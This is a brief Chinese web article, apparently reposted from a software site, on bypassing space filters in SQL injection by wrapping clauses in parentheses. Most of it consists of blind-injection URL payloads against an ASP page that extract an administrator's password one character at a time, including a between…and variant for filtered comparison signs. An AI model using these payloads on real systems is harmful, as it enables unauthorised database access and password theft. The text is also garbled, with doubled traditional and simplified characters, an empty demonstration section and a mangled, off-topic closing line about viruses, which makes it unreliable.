使用“()”繞過空格繼續(xù)注射
發(fā)表時間:2023-05-24 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]舉個例 子說一下, 我們得到一個注入點:jmdcw.asp?name=aa'and 1=1 and ''=', 如果替換其中的1=1為查詢管理員的密碼的語句: (s...
舉個例 子說一下, 我們得到一個注入點:jmdcw.asp?name=aa'and 1=1 and ''=', 如果替換其中的1=1為查詢管理員的密碼的語句:
(select asc(mid(pass,1,1)) from [name] where id=1)>49
如何用空格呢?其實可以寫成這樣的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了<和>符號, 則用between…and…, 語句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='
對于中間應(yīng)該出現(xiàn)空格的地方, 用()進(jìn)行替換, 不過, 對于很復(fù)雜的SQL語句就不太好用了。 上面說到的是字符型的, 如果是數(shù)值型, 可以在id=1后加一個括號, 不過這個我沒有測試,
比如:jmdcw.asp?id=(1)and(select.....), 應(yīng)該是可行的吧?
實例演示:
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
